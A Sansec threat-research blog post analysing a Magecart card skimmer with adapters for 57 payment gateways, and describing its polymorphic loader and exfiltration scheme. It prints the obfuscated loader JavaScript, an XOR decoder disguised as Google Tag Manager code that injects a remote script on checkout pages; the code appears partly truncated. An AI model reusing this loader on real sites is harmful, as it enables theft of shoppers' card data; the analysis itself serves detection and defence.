Sansec logo

57 payment gateways from Germany to Brazil targeted


by Sansec Forensics Team

Published in Threat Research − April 29, 2019

57 payment gateways from Germany to Brazil targeted

Sansec discovered a polymorphic skimmer that works with 57 different payment gateways. It has global reach, affecting payment systems from Germany to Brazil. It is by far the most advanced skimmer to date.

This skimmer consists of two components: a polymorphic loader, and a sophisticated exfiltration mechanism that supports dozens of payment gateways.

The skimmer uses as bootloader and exfiltration server. The domain points to a Ukraine-registered server. The loader has been injected into dozens of stores, with Puma Australia being the latest case.

Dozens of payment gateways supported

The actual exfiltration code (readable copy) shows extensive research. It contains adapters for 57 payment gateways. Apart from the major ones such as Stripe, it also supports local payments, from Australia to Germany to Brazil. Effectively, this skimmer can be injected in various checkout pages and not require manual modification by the perpetrator.

Among the 57, these popular payment gateways can be identified:

  • Adyen (NL)
  • Stripe (US)
  • Pin Payments (AU)
  • eWAY Rapid (AU)
  • Heidelpay (DE)
  • Generic CC payment
  • Fat Zebra (AU)
  • Radweb (UK)
  • Braintree (US)
  • (BR)
  • Cryozonic Stripe (UK)
  • Cartoes (ES)
  • Authorize.Net (US)
  • Cielo (BR)
  • Secure Trading (UK)
  • Paymetric (US)
  • Moip (US)
  • Ebanx (BR, MX)
  • MundiPagg (BR)
  • PagSeguro (BR)
  • Payment Express (AU)

A polymorphic loader

Skimmers are in the business of hiding their code well. It's trivial to render code unreadable (using code obfuscators) but the very presence of unreadable code is clearly suspicious. So an alternative strategy is to mimick legitimate code, such as Google Analytics. However, these hand-crafted impersonations are easy to locate, once you have identified one. And a professional skimmer does not want all of his "properties" exposed whenever a single instance is discovered.

The skimmer's solution is to use polymorphic code. The Jqueres loader (below) contains redundant decoy words such as selectDuration, pickFooter, optEmbed.

(function (w, d, s, l, i) {
  w[l] = w[l] || [];
  w[l].push({ "gtm.start": new Date().getTime(), event: "gtm.js" });
  var f = d.getElementsByTagName(s)[0],
    j = d.createElement(s),
    dl = l != "dataLayer" ? "&l=" + l : "";
  j.async = true;
  j.src = "" + i + dl;
  var keyProc = null,
    innerMeta = [
    optEmbed = -1,
    pickFooter = function (s, k) {
      var r = "",
        c = null,
        x = null;
      for (var i = 0, j = 0; i < s.length; i += 2, j++) {
        if (j == k.length) j = 0;
        x = parseInt(s[i] + s[i + 1], 16);
        r += String.fromCharCode(x ^ String(k[j]).charCodeAt());
      return r;
  var revSolution = pickFooter("130a12044c04295e561d0f0404", "pxwe8al23pjj"),
    sortResult = pickFooter("031b050c4815", "pxwe8al23pjj"),
    attrTooltip = pickFooter("031d03244c151e5b51051e0f", "pxwe8al23pjj"),
    selectDuration =
      window[pickFooter("1c1714044c08035c", "pxwe8al23pjj")][
        pickFooter("0019030d56000157", "pxwe8al23pjj")
    receiveEndpoint = pickFooter("19161300402e0a", "pxwe8al23pjj");
  var resAgreement = pickFooter("030a14", "pxwe8al23pjj"),
    toggleScale = document[pickFooter("181d1601", "pxwe8al23pjj")],
    licenseMaximum = pickFooter("1108070056052f5a5a1c0e", "pxwe8al23pjj");
  for (var i = 0; i < innerMeta.length; i++)
    if (
        pickFooter(innerMeta[i], "pxwe8al23pjj")
      ) !== optEmbed
    ) {
      keyProc = document[revSolution](sortResult);
})(window, document, "script", "dataLayer", "GTM-WYRDH");

However, a global search for the structure of this code (instead of the actual object names) yields dozens of similar cases. They contain plausible but completely made-up keywords such as:

  • googleLabel
  • updMsg
  • propVersion
  • cachefooter
  • sortproc
  • subCatalog
  • sumMenu
  • onClipboard
  • optViewport
  • targetscope
  • appendtooltip
  • setupScreen
  • strictheight
  • hashProcedure

Nevertheless, in all cases the loader tests for "checkout" in the current adddress and injects an extra script source for Given a whitelisted referrer, this address serves the exfiltration code. Otherwise, an innocuous decoy is served.

What does this all mean

The sophistication of this skimmer clearly demonstrates the automated workflow of skimmers. It also suggest a collaborative effort: there is no way that a single person could study all of these localized payment systems in such detail.

Effectively, it is a sign of the maturity of the online skimming industry, which is here to stay for a while.

How to prevent or mitigate a Magecart attack

New attack methods are literally discovered every week. Whenever a new attack pattern emerges, it usually takes 6 to 12 hours before stores across the globe are getting exploited. Because the timeframe is so small, you need an automated solution to identify and prevent attacks. Our eComscan threat and vulnerability monitor does just that. It is optimized for Magento and is the best protection that exist for merchants today. Get a copy here.

Read more

Scan your store now
for malware & vulnerabilities

$ curl | sh

eComscan is the most thorough security scanner for Magento, Adobe Commerce, Shopware, WooCommerce and many more.

Stay up to date with the latest eCommerce attacks

Sansec logo

experts in eCommerce security


Terms & Conditions
Privacy & Cookie Policy
Company Reg 77165187
Tax NL860920306B01